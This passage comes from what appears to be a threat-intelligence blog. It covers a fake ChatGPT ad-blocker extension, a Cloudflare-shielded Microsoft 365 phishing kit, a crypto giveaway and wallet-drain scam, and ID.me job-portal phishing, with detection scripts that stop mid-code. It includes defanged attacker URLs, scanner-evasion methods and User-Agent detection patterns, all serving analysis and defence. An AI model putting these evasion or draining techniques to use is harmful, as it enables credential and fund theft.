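if __name__ == "__main__":
    found = scan_extension(SAMPLE_FILES)
    print(found, verdict(found), webhook_urls(SAMPLE_FILES))
```

Pattern hits are deliberately kept separate from the verdict: cloneNode(true) or an alarm on its own is common in legitimate extensions, and it is the combination of a DOM export with a file upload to a chat-platform webhook that has no benign reading for an ad blocker.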
Having identified the suspected GitHub content retrieval as part of the extension’s core logic, we investigated the account “krittinkalra” as possibly associated with this activity and noted a trend in past projects leading up to the identified malicious application. As a disclaimer, we are not attributing the alleged persona in the identified account but instead following a lead about the account itself.
GitHub Account Age: ~12 years (created ~2014)
Previous Activity: Android kernel development (C/C++, 2014-2020)
Activity Gap: 5+ years dormant (October 2020 - February 2026)
Skill Pivot: C/C++ kernel developer → JavaScript malware (no transition)
The GitHub alias “krittinkalra” is also linked to the extension on the Chrome Web Store and to X (formerly Twitter). On X, the persona stated they also created AI4ChatCo and Writecream.
Writecream alleges to generate marketing content, sales emails, blog articles, and stunning visuals in seconds with AI. AI4ChatCo alleges it is an AI platform integrating models like ChatGPT and Stable Diffusion to offer advanced chatbots, content generation, and workflow automation for over 1.5 million users worldwide.
It begs the question, is there similar user data theft, privacy violations, and malware in those apps?
Conclusion
Ads aren’t normally what we want to see, but malware and our private data and conversations being stolen is certainly lower on the list. This identified activity appears to be positioning to take advantage of the dramatic shift in OpenAI’s policy to serve up advertisements to its free tier users by distributing malicious Chrome extensions alleging to block ChatGPT ads. Specifically, the extension's primary purpose is data harvesting—stealing the full conversation structure, user prompts, and metadata—and exfiltrating it via a Discord webhook. Again, it begs the question, does the risk extend to other apps created by the same developer persona, krittinkalra, like AI4ChatCo and Writecream, which warrants further investigation into similar user data theft or privacy violations.
Security Advisory:
Be Skeptical: Treat any extension, especially those that promise to block ads on high-value sites, with extreme suspicion and scrutinize its requested permissions.
Investigate Related Services: Due to the developer's suspicious activity treat the affiliated services, AI4ChatCo and Writecream, as potentially compromised until proven otherwise.
Caution with Out-of-Band Services: Be extremely cautious with out-of-band AI services, such as those acting as intermediaries, resellers or add-ons. There is no guarantee they are acting in your best interest regarding your privacy and security and are well positioned to read and/or modify your conversations.
SecuritySnack - CloudFlare Anti-Security For Phishing
A Microsoft 365 credential harvesting campaign is exploiting CloudFlare's anti-bot and human verification features to evade detection. Learn how attackers use IP blocklists, user-agent filtering, and obfuscated scripts to bypass security scanners—and what it means for the industry.
Service platforms that provide protection and content delivery, like CloudFlare, have become a go-to for many web service hosts—including some malicious actors. These platforms offer inherent benefits like obfuscation, anti-bot, and anti-scanner tools. While excellent for defending legitimate customers, these very features can inadvertently shield malicious sites from proactive identification by security professionals and automated scanning services. This creates a challenging dynamic in the industry where a service provider's role in protecting its customer base competes with the broader community's need for effective security scanning.
This report details a recent Microsoft 365 credential harvesting campaign that leverages this dynamic to delay detection and risk profiling. The campaign implemented multiple anti-detection techniques including the use of CloudFlare human verification, hardcoded IP block lists, user agent checks, and multiple sites and redirects. This cluster highlights the need for service providers to consider taking on an even greater responsibility in knowing their customers and ensuring their defensive capabilities are not being abused to actively protect malicious actors.
Details
securedsnmail[.]com
https[:]//securedsnmail[.]com/secdex.html
Gatekeeping and redirection paths
The site code contains a few layers of gatekeeping to ensure the visitor is a real target and not a security tool.
CloudFlare Human Verification: There's an initial CloudFlare human verification check and redirection.
Aggressive IP and User-Agent Filtering: The site code fetches details about the visitor's IP using https[:]//api.ipify[.]org/?format=json and checks it against a hardcoded blocklist. This list includes ranges belonging to major security companies (Palo Alto, FireEye) and cloud providers (AWS, Google), as well as search engine crawlers.
It also sniffs the visitor's browser for bot-like User-Agents. If a security scanner or bot is detected (e.g., Googlebot, Bingbot, AhrefsBot, or Twitterbot), the page replaces itself with a fake "404 Not Found" message to prevent the malicious site from being indexed or flagged.
User Agent Checks:
IP Checks:
The core credential theft logic is not written in standard JavaScript. Instead, it is executed by a custom VM function (e_d007dc) that interprets an array of encoded instructions. This prevents static analysis from identifying the data-stealing parameters or the Command & Control (C2) URLs.
The framework dynamically updates its destination. When the gatekeeping checks trigger, it switches the URL in the VM to a legitimate domain like Google.com, neutralizing the malicious footprint for any subsequent analysis.
Obfuscated Credential Harvesting:
If the user passes these checks, the obfuscated script builds the credential harvesting URL in the following format and redirects them to it: `https[:]//office.suitetosecured[.]com/KuPbXodA?b=cGjQKg4&auth={}`. The auth value it assigns is presumably used to verify and track the user passing the gatekeeper to the next-stage sites.
In reviewing the multiple phishing sites identified in this campaign, a commonality in the Cloudflare turnstile configuration was observed. The Cloudflare Turnstile sitekey (0x4AAAAAACG6TJhrsuZdpjsN) is a static identifier. Specifically, the “CG6TJhrsuZdpjsN” portion appears to be the unique identifier created when a Cloudflare user sets up the Turnstile widget in their CloudFlare dashboard. Security teams could possibly pivot on this key across telemetry sources (e.g. Shodan, Censys, URLScan) to identify newly registered phishing sites before they are utilized in campaigns.
Registration Commonalities
Nameserver: cloudflare.com
Registrar: NAMECHEAP INC
mx host: registrar-servers.com
IP ISP: CloudFlare Inc.
MX Domain:
jellyfish[.]systems
registrar-servers[.]com
Conclusion
The strategic abuse of legitimate content delivery and security platforms, such as CloudFlare, by malicious actors creates a considerable obstacle to proactive security scanning and detection. The Microsoft 365 credential harvesting campaign described in this report, which also employed multiple anti-detection mechanisms, shows how these defensive features can inadvertently shield malicious sites, delay their detection, and hinder informed risk assessments. To address this evolving dynamic, service providers should accept greater responsibility in knowing their customers and ensuring their platform's security capabilities are not leveraged to actively protect malicious campaigns.
A broken snowblower belt taught me something cybersecurity professionals often forget — saying "I don't know" isn't failure. It's where the real work begins.
I’ve never touched a motor before in my life.
This is about cybersecurity, I promise. Bear with me a minute.
The ground outside the DTI Boston Satellite Office (my living room) is thick with snow. We had it easy through most of January, and then multiple blizzards. And after the first one, a piece of ice lodged in the auger of my snowblower, and the impeller belt ripped itself apart.
Deciding I could replace the belt myself involved a bit of hubris, in retrospect. Because as noted, I’ve never touched a motor of any type before in my life. So it should not have been a surprise when I found myself sweating over the guts of my snowblower on a Thursday night trying to force the belt into place.
It didn’t help that my machine included a third wheel of sorts, a tensioner that didn’t exist in any manual or online video about replacing the impeller belt in my exact model. But a life of spreadsheets and threat hunting did not prepare me for motor mechanics, oddly enough.
So I reached out. Because I didn’t know, and while I tried to brute force it, and research it, nothing worked. I tried to bribe the belt into place, and threaten it, and cajole it. None of this resulted in the least amount of progress, and so I asked for help.
There’s still a stigma in admitting you don’t know something in infosec; “information” is in the name, after all. And the sentence “I don’t know” is treated as a failure. But what we need to do is treat it as a starting point instead; “I don’t know, yet.”
I articulated the problem and showed my work. A few minutes later came a reply: “Oh. So. What you need to do is…”
And a few minutes later the snowblower was running like new.
Be the person that reaches out for help when you need it, and show this industry that’s okay. But also be the person that answers when you can, to show each other we’re not alone.
Articles
Almost feel like I need to add an extra section just for Google Threat Intelligence Group - they’ve spent the past few weeks putting out piece after piece of great intel. As always, grateful for folks sharing like this.
Lots of other good reading out there this month, though, too:
Infoblox Threat Intel - Compromised Routers, DNS, and a TDS Hidden in Aeza Networks - One of the best DNS investigation posts I’ve ever read, and I’ve read a lot of them. Infoblox TI not only provides the results of their research, but shows in-depth steps on how to recreate it by eliciting responses from secretive recursive servers, for example.
Gitlab Threat Intelligence - GitLab Threat Intelligence Team reveals North Korean tradecraft - Excellent deep dive into both the fraudulent enterprise IT worker threat and the Contagious Interview campaign, the latter of which targets job applicants for compromise.
Symantec/Carbon Black Threat Hunter Team - North Korean Lazarus Group Now Working With Medusa Ransomware - The brevity here is respectable - it’s actually a very information-dense post with some deeper implications for DPRK-targeted ecospheres.
Research Papers and Reports
Crowdstrike - 2026 Global Threat Report - Heavy on the AI stuff, which I am always skeptical of, but I haven’t dived deeply into the guts here yet.
Tools and Resources
PulseBeat02 - yt-media-storage - Encodes any data into lossless video styles to store on YouTube, and decodes them back into the original data, for exfiltration etc. I suppose if you can store a PNG on a starling, you can exfiltrate crown jewels via YouTube.
An analysis of an active cryptocurrency scam operation impersonating Trump, Musk, and Truth Social across 250+ domains — uncovering shared wallet infrastructure, on-chain laundering pipelines, and the tactics used to fake legitimacy.
In the past few years, some public figures, including President Donald Trump and Elon Musk, began using the social media platforms they own (Truth Social and X, formerly Twitter, respectively) to promote investments in various cryptocurrencies named in their likeness or of which they were prominent holders. $TRUMP coin, for example, was created on January 17, 2025 and endorsed by the official Trump Truth Social account. Likewise the $WLFI coin, in which Trump and his children are listed as co-founders and executives. $MELANIA was similarly endorsed by official Melania Trump posts on X. The list goes on, earning Trump the title of “Crypto President”. Elon Musk has a longer history of high-profile cryptocurrency endorsements; in fact, his repeated posts pushing his X followers to invest in Dogecoin led to him calling himself the “Dogefather” on Saturday Night Live. As these figures have posted promoting or endorsing these currencies, threat actors have begun spoofing those endorsements and promotions to lure users into crypto scams. They spoof the real social media pages and posts and promote cryptocurrency much like the real personas do, but for their own gain.
This report documents the analysis of a cryptocurrency scam operation. The operation has been active since at least January 2025 and spans roughly 250 identified domains across multiple scam themes. Nearly all target retail crypto users, but use different approaches to get their money.
Details
The investigation started with an identified set of 60 suspected scam domains sharing the same Google Analytics tag ID. Upon scanning them and extracting wallet addresses from the ones that were live, we verified those wallets against blockchain APIs and attempted to trace the funds. That work uncovered the first campaign, a network of fake celebrity crypto giveaway sites. A shared actor wallet address and domain registration pattern then led us to a second, larger set of more technical scam configurations involving fake token presale sites impersonating a wide variety of real blockchain projects.
Idol Scam Templates:
The idol scam template set is a collection of sites impersonating Elon Musk, Donald Trump, and Truth Social, all pushing the same basic pitch: send crypto and get double back. About 11 of the 60 domains were active with extractable wallets. Several share common nameserver infrastructure at streetplug[.]me.
On-chain, the picture was straightforward. The two most active BTC wallets received a combined ~1.5 BTC, but tracing showed all of it came from a single central funder address — not from victims. The actor was likely sending money to themselves to inflate the on-chain transaction history and make the wallets look active. A bridge address connected both wallets with a dust transaction, confirming single-actor control. Downstream, the funds moved through a 5-layer laundering pipeline ending at high-volume mixing or OTC services, some with hundreds of thousands of transactions and multiple fraud flags. One of the upstream wallets was previously reported as being owned by ChangeNow.io, a cryptocurrency swap service that allows transactions to happen wallet-to-wallet instead of involving an exchange like CoinBase or Binance. The pipeline predates this campaign. The intermediary addresses have activity going back to May 2024 with hundreds of transactions, which we suspect is an indication this infrastructure has been used for other operations previously.
We found no confirmed victim deposits in the wallets we could trace, but that doesn't mean there are no victims. The actor may use different receiving addresses than the ones displayed on the sites, or victims may exist in transaction history we couldn't access. However, what we can confirm is that the on-chain activity we traced is the actor moving their own money around.
Example scam sites “trump4u[.]org” and “trumppresent[.]top” masquerade as Truth Social posts by President Trump that purport to announce an executive order handing out cryptocurrency rewards to those who click the links. While it is true that President Trump has officially established a Strategic Bitcoin Reserve and a U.S. Digital Asset Stockpile, the specific posts are designed to look like related Truth Social posts in order to trick users into participating in a fraudulent giveaway.
Similar scam sites spoof a Medium page and masquerade as a user named “Elon Musk”, as in the following screenshot of “usaevent[.]live”.
Other scam variations show Elon Musk alongside an “X” logo, purportedly endorsing a casino-related site with a reward for signing up.
One of the scam’s instructions:
In each of these examples, multiple layers of incentives and ploys are used to appear legitimate and pressure site visitors into falling for the scam.
Incentives:
Fake Comments:
Fake Transactions generated by code on a hardcoded interval
The endgame of the scam is to convince site visitors to click any of the three links, which lead to other pages displaying crypto wallet addresses, and send money from their own wallet.
Example: trumpbtc[.]top/btc/index.html from Trump variation
Example: usaevent[.]live with 1musk novelty address variation
Exchange Spoof / Token Presale Drain Templates:
The second style of template uses a less direct approach than the send-and-double scam and instead masquerades as a legitimate exchange. An example is the scam site magaeth[.]bid, which impersonates MegaETH, a real Layer 2 blockchain project, using a cloned website template from bio[.]xyz. Instead of asking victims to manually send crypto, this site connects to their MetaMask wallet and initiates transactions through what looks like a smart contract interaction. Like the other templates, these scams also use various incentives to trick users into connecting their wallets. They typically appeared to load wallet addresses dynamically rather than hardcoding them as the other template examples do.
The "contract" address in this example (0x134685b581EE7d987c3Caf998CA93CF31BA4Ce10) is just a regular Ethereum wallet, an EOA (Externally Owned Account) with no deployed code on any chain. The following wasn’t fully verified, but we suspect the site's JavaScript constructs Web3 contract calls with a full ABI; when those calls hit the EVM (Ethereum Virtual Machine) targeting an EOA, the chain simply transfers the ETH (Ether, the native cryptocurrency of the Ethereum ecosystem) value and ignores the rest. The victim sees a successful transaction and thinks they bought tokens. In reality, their ETH went straight to the scammer's personal address.
We suspect the site also has two theft mechanisms. The first is a presale form that takes whatever amount the victim enters, multiplies it by 0.985, and sends the result to the scammer. The second is an airdrop withdrawal function that reads the victim's entire wallet balance and sends nearly all of it. If the victim doesn't have enough to be worth draining, the site tells them to deposit more first.
From this scam site, magaeth[.]bid, we suspect there were two victim transactions on Ethereum mainnet totaling 0.1521825 ETH (~$300). Both carried the buyTokens() function selector in their input data, and the first transaction's value (0.0985 ETH) matches exactly what the code would produce from a 0.1 ETH input (0.1 × 0.985). Both senders appear to be real retail users. As of finishing this investigation, the funds haven't been moved.
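One way a wallet-monitoring or investigation script can surface the pattern described above (function-call calldata sent to an address with no code, plus the 0.985 presale multiplier) is shown below. This is an added example, not the scam site's code or anything from the report; the code-table stand-in for eth_getCode and the buyTokens() selector hex are assumptions, while the EOA address and the 0.0985 ETH value are taken from the report.

```python
from dataclasses import dataclass
from decimal import Decimal
from typing import Optional

WEI_PER_ETH = Decimal(10**18)
PRESALE_FEE_FACTOR = Decimal("0.985")  # per the report: amount entered x 0.985 is what gets sent

# Stand-in for eth_getCode results (address -> runtime bytecode). The first entry is the
# EOA the report cites; the contract address and its bytecode fragment are constructed.
CODE_TABLE = {
    "0x134685b581ee7d987c3caf998ca93cf31ba4ce10": "0x",
    "0x00000000000000000000000000000000000c0de1": "0x6080604052348015600f57600080fd5b50",
}


@dataclass(frozen=True)
class Tx:
    to: str
    value_wei: int
    input_data: str  # hex calldata as returned by eth_getTransactionByHash


@dataclass(frozen=True)
class Finding:
    flagged: bool
    reason: str
    selector: Optional[str]               # first 4 bytes of calldata, if any
    implied_input_eth: Optional[Decimal]  # value / 0.985, when it lands on a round amount


def is_eoa(address: str, code_table=CODE_TABLE) -> bool:
    """An address with no deployed code is an EOA: calldata sent to it is silently ignored."""
    return code_table.get(address.lower(), "0x") in ("0x", "")


def selector_of(input_data: str) -> Optional[str]:
    """Return the 4-byte function selector, or None for a plain value transfer."""
    data = input_data.lower().removeprefix("0x")
    return "0x" + data[:8] if len(data) >= 8 else None


def implied_presale_input(value_wei: int) -> Optional[Decimal]:
    """Undo the 0.985 multiplier; report it only if the result is a round, user-entered amount."""
    implied = Decimal(value_wei) / WEI_PER_ETH / PRESALE_FEE_FACTOR
    rounded = implied.quantize(Decimal("0.0001"))
    return rounded.normalize() if rounded == implied else None


def analyse(tx: Tx, code_table=CODE_TABLE) -> Finding:
    """Flag 'contract calls' whose target has no code: the EVM just moves the ETH."""
    sel = selector_of(tx.input_data)
    if sel is None:
        return Finding(False, "plain value transfer, no calldata", None, None)
    if not is_eoa(tx.to, code_table):
        return Finding(False, "calldata sent to a deployed contract", sel, None)
    return Finding(True, "function-call calldata sent to an EOA: ETH transferred, call ignored",
                   sel, implied_presale_input(tx.value_wei))


# Constructed sample transactions. The 0.0985 ETH value and the EOA are from the report;
# the buyTokens() selector hex is assumed here, not quoted in the report.
SAMPLE_TXS = [
    Tx("0x134685b581EE7d987c3Caf998CA93CF31BA4Ce10", 98_500_000_000_000_000, "0xd0febe4c"),
    Tx("0x00000000000000000000000000000000000c0de1", 98_500_000_000_000_000, "0xd0febe4c"),
    Tx("0x134685b581EE7d987c3Caf998CA93CF31BA4Ce10", 50_000_000_000_000_000, "0x"),
]

if __name__ == "__main__":
    for tx in SAMPLE_TXS:
        f = analyse(tx)
        print(f"{tx.to[:10]}... flagged={f.flagged} selector={f.selector} "
              f"implied_input={f.implied_input_eth} ({f.reason})")
```

In live use, replace CODE_TABLE with an eth_getCode call against the chain the transaction was sent on.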
These sites mimic a crypto exchange giveaway, displaying Elon Musk and/or Donald Trump branding. Victims are told to send crypto to receive double back.
Three wallets use a "1musk" vanity prefix — the actor generated BTC addresses starting with "musk" to reinforce the Elon Musk impersonation. Sites share common decoy addresses in HTML (invalid/truncated strings used as visual filler).
Cluster 2: "Truth Social" Template (4 domains)
Replicate the Truth Social interface with fake posts attributed to Trump about crypto policy or giveaways.
Self-Dealing
Looking up these wallets using open services like blockchain[.]com, we can see transactions to and from the wallet addresses on the scam sites. In some cases it gives the appearance that more than 40k USD worth of transactions had been sent to or from the scammer’s wallets.
Example scammer wallet transaction history:
However, on closer inspection in chain analysis, we see these transactions are from wallets likely controlled by the scammer and are intended to trick users into thinking they are legitimate wallets.
Transaction tracing revealed the on-chain BTC activity is the actor sending money to themselves, not real victim payments.
Single funding source
Scam Wallet 1 received from exactly one sender (central funder). Zero external deposits.
Same funder, two campaigns
Central funder sent wallets on multiple different scam domains
Bridge cross-link
15aeJcFdBD... received 0.269 BTC from Scam Wallet 1, then sent 0.00006 BTC dust to Scam Wallet 2. Direct on-chain link.
Drain convergence
Both scam wallet chains funnel into bc1qp4v9mj...
Rapid drain pattern
Funds moved out within hours of deposit
In this example, all recent inbound transactions were from a single sender, rUg8ac5ikpTaWk5RPei8xuYkNEyUs53G1i. Both sender and scam wallet share a parent Binance hot wallet, a wallet that is connected to the internet allowing for fast trading (rDAE53VfMvftPB4ogpWGWvzkQxfht6JPxr, verified binance.com, 115M XRP). The pattern is consistent with self-transfers between Binance sub-accounts used by the scammer.
Chain Analysis
Starting from the scam wallets, funds were traced upstream (funding source) and downstream (drain destinations) through 5 layers of addresses.
Actor Wallet Pipeline:
Circular flows: Drain 2 sends to Musk Drain, which sends back to Convergence Drain. Bridge sends back to Drain 2. This tangles the trail.
Bridge cross-link: The dust transaction from Bridge to Scam Wallet 2 is the definitive on-chain proof connecting both scam campaigns.
Prior activity involving wallets suspected to be the scammer’s suggests this pipeline was not built for this one campaign and was designed with larger scale in mind.
Convergence drain has 229 txs dating to May 2024.
Prior scam node bc1q0qc892... has 723 txs (transactions).
The intermediary, 16mJhtpey…, has 1,276 txs.
Single-destination aggregator: 16mJhtpeyctW... has 1,276 txs but sends to exactly one address. This is either automated or purpose-built for batching before passing to a mixer.
Registration patterns and website configurations had multiple commonalities. A common Google Analytics tag was used across approximately 50 of the scammer’s sites, as was a registration email address.
Website Titles:
Elon Musk — Official BTC, ETH & DOGE Giveaway!
Truth Social
LitEnergy — Official Crypto Event
NEAR Protocol | Pool Event
MegaETH | The First Real-Time Blockchain
Monad | The Most Performant EVM-Compatible Layer 1 Blockchain
USA X Crypto Giveaway
Elon Musk — X Crypto Giveaway
Exchange | PancakeSwap
Lottery | PancakeSwap
Hasbulla
Initia
Home - Kaspa
Earn and Borrow Crypto | World Liberty Financial
BIO Protocol - Listing on Binance Launchpool
BIO • Home
Solv Protocol - Stake your Bitcoin today!
ELSKTRADING | Welcome to ELSK Trading
MX IP: 5.189.161[.]88
The following are screenshot samples of the various scam sites associated with this activity. Notably all are overtly crypto related with one exception, an alleged virtual machine resource for AI Agents that could be “claimed” by applying from the site “avm-code[.]com”. That exception has been taken down by Cloudflare for phishing activity:
Conclusion
This investigation mapped a cryptocurrency scam operation spanning roughly 250 domains, two distinct theme types, and at least 24 actor-controlled wallet addresses across BTC, ETH, and XRP. The operation is suspected of being run by a Russian-speaking actor and has been active since at least January 2025.
We identified two thematic campaigns linked by a shared Ethereum wallet address and overlapping registration patterns. The first is a broad network of fake giveaway and doubler sites impersonating idolized personalities, namely Elon Musk, Donald Trump, and Truth Social, as well as various crypto projects. It is distributed across three hosting clusters, including bulletproof infrastructure. The second consists of more technically advanced fake token presale sites such as megaeth[.]bid, which connects to victims' MetaMask wallets and initiates transactions that look like smart contract interactions but are actually direct transfers to the scammer's personal address.
The on-chain findings were mixed. For the giveaway sites, blockchain tracing showed the actor funding their own wallets from a central source and cycling approximately 1.5 BTC through a multi-layer laundering pipeline ending at high-volume mixing services. We found no confirmed victim deposits in those wallets. For the second themed campaign we ran down a few of the many sites, such as the megeth[.]bid site, where we confirmed two real victim transactions totaling 0.1521825 ETH (~$300). We verified both through function selector matching and value calculation alignment with the scam code. Those funds remain unmoved in the scammer's wallet.
The confirmed financial impact so far from our limited scope of chain analysis is small, roughly $300 from two victims. However, the infrastructure tells a different story. There are hundreds of similar domains over the past year and the identified laundering pipeline has intermediary addresses with hundreds to thousands of transactions dating back to mid-2024, well before the current campaign. The terminal wallets at the end of the chain have transaction counts in the hundreds of thousands and carry multiple fraud flags from independent reporting databases. The actor registered hundreds of domains, set up hosting across multiple jurisdictions, generated vanity Bitcoin addresses, and built scam toolkits that work across Ethereum and Binance Smart Chain. This is not the infrastructure you build for $300. The operation is designed for sustained, repeatable use, and we are most likely seeing a narrow slice of its total activity.
The strongest investigative leads going forward sit outside of blockchain analysis. The Binance sub-account identified behind the 381,813 XRP wallet is a direct path to KYC records. The domain registration and hosting infrastructure, particularly the shared nameservers at streetplug[.]me and the EuroByte hosting cluster, could yield registrant details. Commercial chain analysis tools (Chainalysis, Elliptic) would likely have attributions for the terminal mixing wallets that our open-source methods couldn't resolve. The blockchain trail itself, by design, ends at services built to break traceability.
What we can say with confidence: a single actor controls both campaigns, uses Russian-language code artifacts, operates from infrastructure that spans France, Russia, and UK-based bulletproof hosting, and has built a wallet pipeline capable of handling significantly more volume than what we observed. The two confirmed victims on megaeth[.]bid are likely real people, one funded from Coinbase, the other a multichain DeFi user, who lost money to a scam disguised as a legitimate blockchain project. There are almost certainly more.
This OWASP guide popped up on my radar this week and, yes, it’s about AI. And yes, it’s entirely predictable. But what appeals to me at the moment is its predictability amidst the nondeterminism of LLM rakestepping. Catastrophic outcomes in these complex systems are foreseeable not just from today, or the day this Adversa post was published, but at least from 1984. It was in 1984 that sociologist Charles Perrow published “Normal Accidents: Living With High-Risk Technologies.” Normal Accidents had nothing to do with artificial intelligence, yet seeing how it’s being deployed today, the book now has everything to do with it. Perrow studied major industrial accidents across much of the twentieth century and isolated some important insights on unexpected catastrophic failures inevitable enough to be called Normal Accidents:
The system is complex.
The system is tightly coupled.
The system has catastrophic potential.
In the agentic systems we see proposed and being implemented before us, certainly complexity plays an integral role - the dirty little secret of LLMs is that to make one useful, especially for a specialized expert task, you’re dealing with multiple layers of LLMs with varying levels of autonomy. It’s the sausage being made behind that single pane of glass most AI products pretend to be.
We then turn to tight coupling - essentially, complex systems producing outputs that must occur in a specific order, such as a multi-stage chemical treatment process. It is the anticipated sequence - in Perrow’s words, the invariant sequence - where B must follow A, because that is the only way to make the product - that defines tight coupling. Think about the sub-tasks each Agent is charged with; pre-prompt hardening against injection attacks, shifting tone and scope of the LLM response, providing expectations to shape system output. Above that and the primary agent doing the task, you have multiple other systems working to evaluate, validate, and re-shape output before it’s pushed to the surface agent, who relays it to you. Should those multiple subsystems interact in varied ways or orders, the output is necessarily - perhaps catastrophically - affected.
Catastrophic potential is mostly self-evident, but let us take a specific example: the modern Security Operations Center, or SOC. Perrow’s book provides multiple corollary environments - think a Nuclear Power operations center full of sensors, monitors, and potential alerts. Or the cockpit of a commercial airplane, which had seen much more automation in the decades prior to 1984 and provided starkly relevant examples of alert and attention issues at critical moments. Indeed, we see SOC failures in some of the biggest hacks on record, where alerts are missed or disregarded, leading to major systemic damage.
So in the SOC we have a complex, tightly-coupled system with catastrophic potential. “The essence of the Normal Accident,” Perrow wrote, is “the interaction of multiple failures that are not in a direct operational sequence.” That is, system components interacting in sequences and ways not only unexpected, but “incomprehensible” during the incident, often leading to much worse outcomes.
And what do we do, 42 years after Normal Accidents’ release? We add a complex, relatively tightly-coupled system of agents to a complex, certainly tightly-coupled system with catastrophic potential called the Security Operations Center. And not only that, but a system of agents fundamentally empowered by their own nondeterministic nature.
“What distinguishes these [system component] interactions,” Perrow wrote, “is that they were not designed into the system by anybody; no one intended them to be linked. They baffle us because we acted in terms of our own designs of a world that we expected to exist - but the world was different.”
In the rush to the AI/Agentic SOC, expect many Normal Accidents.
CERT Polska - Energy Sector Incident Report - If you’re reading this list, you’ve probably already seen this, but linking in case that’s untrue. Probably the best of the recent resources around the Polish energy grid incident, and worth becoming familiar with. Also good writeups by Kim Zetter here, here, and here.
UK Defence Journal - Iranian-linked Scottish accounts fall silent again - Social media accounts that posed as supporters of Scottish Independence once again fell silent amidst the Iranian internet blackout. Fun little detection, if not necessarily a fine one.
Greynoise - -f Around and Find Out: 18 Hours of Unsolicited Telnet Houseguests - Telnet? What year is it?!?! All kidding aside, Greynoise is making some fascinating moves lately, and as much of an AI skeptic as I am, hrbmstr’s experiments with AI analysis show some real value there.
APNIC - What we learned from 63,000 attacks in 12 days on APNIC Honeynet sensors at University of Dhaka - “In just twelve days, our sensor was hit 63,247 times by 4,262 unique source IPs, including five unique IP addresses from Bangladesh. Fourteen of those led to malware download attempts. The time to first attack was less than one hour, and we averaged ~5,270 attacks every single day!” - Not groundbreaking, but another eye-opening bit of research showing with data just how dangerous the internet can be, packet-wise. Good work and writeup on their part.
Phishing campaign targets job seekers with fake career portals and interview invites, stealing ID.me credentials and deploying malware since August 2025.
A malicious actor has created several domain masquerades of small companies posing as job boards, interview themes, and login pages since approximately August 2025. The activity appears to have two distinct objectives. The first is a credential harvesting scheme targeting ID.me accounts — the official identity provider for US government services like the IRS and SSA — which may then be exploited to facilitate financial fraud, including tax refund theft and fraudulent unemployment benefits. The second cluster focuses on malware delivery, tricking job seekers via fake Microsoft Teams meeting invites to download a malicious, unsigned variant of the remote access tool Connectwise. This gives the attacker access to the victim’s machine where they may conduct follow-on attacks.
Registration Commonalities
Nameserver: namecheaphosting.com
IP ISP: Namecheap Inc.
Mail Server Domain
privateemail.com
jellyfish.systems
SSL Issuer: Sectigo
Registrar: NameCheap Inc.
Server Type: Microsoft
ID.me Credential Harvesting
clock-towerrealty[.]org
apply-untide[.]rentals
The site purports to be a United Rentals Careers portal and uses legitimate links and site content loaded from the real site, jobs.unitedrentals[.]com.
The two buttons on the top right for “Continue Application” and “APPLY HERE” direct to another actor owned domain, clock-towerrealty[.]org.
http[:]//clock-towerrealty[.]org/APPLY/?ff_landing=13 (Continue Application)
https[:]//clock-towerrealty[.]org/APPLY/?ff_landing=10 (APPLY HERE)
The code for clock-towerrealty[.]org contains a credential harvester designed to look like a legitimate corporate portal. This appears to be a brand spoof but not a website spoof of the real entity, Clock Tower Realty in Florida, USA.
The malicious domain is using a cheaply registered WordPress site to trick job seekers into providing their email and password. Credentials being targeted are ID.me. If a scammer gets ID.me credentials, they could potentially perform unauthorized logins to steal tax refunds, apply for fraudulent unemployment benefits, or take over Social Security accounts.
When a user clicks the "Sign In" button after entering their information, the data is sent to admin-ajax.php, suggesting the stolen credentials are being stored in the WordPress SQL database.
These scammers may have taken screenshots of legitimate company logos and sent them via WhatsApp during the development of the scam, hence the file names “WhatsApp-Image”. Seeing "WhatsApp-Image" in a site's source code is a strong indicator that the site is fraudulent. Legitimate companies like United Rentals have dedicated IT departments.
The site is instrumented for marketing and behavior tracking using the Google Tag Manager (GTM) ID “GTM-T75PDC7R”, which appears on multiple other actor-controlled sites created between 2025-08 and 2026-01 that feature the same type of scam.
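Both this report and the Microsoft 365 credential-harvesting report earlier on this page come down to the same triage step: pull static, pivotable identifiers (the GTM container ID here, the Turnstile sitekey there) and gatekeeping tells (the api.ipify.org lookup, crawler User-Agent filtering, the fake 404, "WhatsApp-Image" asset names, a form posting to admin-ajax.php) out of fetched page source. The script below is an added example, not the authors' tooling; the regex shapes are assumptions about how these identifiers appear in HTML, and the sample page is constructed, with only GTM-T75PDC7R and the Turnstile sitekey taken from the reports.

```python
import re
from dataclasses import dataclass, field

# Identifier shapes (assumed) and gatekeeping tells described in the two reports above.
TURNSTILE_RE = re.compile(r"\b0x4AAAAAA[A-Za-z0-9_-]{8,}\b")          # Cloudflare Turnstile sitekey
GTM_RE = re.compile(r"\bGTM-[A-Z0-9]{5,8}\b")                         # Google Tag Manager container ID
GA4_RE = re.compile(r"\bG-[A-Z0-9]{8,12}\b")                          # GA4 measurement ID
WHATSAPP_IMG_RE = re.compile(r"WhatsApp[-_ ]Image[^\"'\s)>]*", re.I)   # screenshots pasted in as logos
BOT_UA_RE = re.compile(r"Googlebot|Bingbot|AhrefsBot|Twitterbot", re.I)
TURNSTILE_PREFIX = "0x4AAAAAA"  # shared prefix; the remainder is the per-widget portion worth pivoting on


@dataclass
class KitFingerprint:
    turnstile_sitekeys: list = field(default_factory=list)
    gtm_ids: list = field(default_factory=list)
    ga4_ids: list = field(default_factory=list)
    whatsapp_images: list = field(default_factory=list)
    ipify_lookup: bool = False      # visitor IP fetched from api.ipify.org for blocklist checks
    bot_ua_filter: bool = False     # crawler/scanner User-Agents matched
    fake_404: bool = False          # page replaces itself with a "404 Not Found" decoy
    admin_ajax_post: bool = False   # form posts to WordPress admin-ajax.php

    def indicators(self) -> list:
        """Names of every indicator present, for a triage note or a detection rule."""
        names = ("turnstile_sitekeys", "gtm_ids", "ga4_ids", "whatsapp_images",
                 "ipify_lookup", "bot_ua_filter", "fake_404", "admin_ajax_post")
        return [n for n in names if getattr(self, n)]


def _unique(matches):
    return list(dict.fromkeys(matches))  # de-duplicate, keep first-seen order


def fingerprint_kit(html: str) -> KitFingerprint:
    """Extract pivotable identifiers and gatekeeping tells from fetched page source."""
    return KitFingerprint(
        turnstile_sitekeys=_unique(TURNSTILE_RE.findall(html)),
        gtm_ids=_unique(GTM_RE.findall(html)),
        ga4_ids=_unique(GA4_RE.findall(html)),
        whatsapp_images=_unique(WHATSAPP_IMG_RE.findall(html)),
        ipify_lookup="api.ipify.org" in html,
        bot_ua_filter=BOT_UA_RE.search(html) is not None,
        fake_404="404 Not Found" in html,
        admin_ajax_post="admin-ajax.php" in html,
    )


def turnstile_pivot(sitekey: str) -> str:
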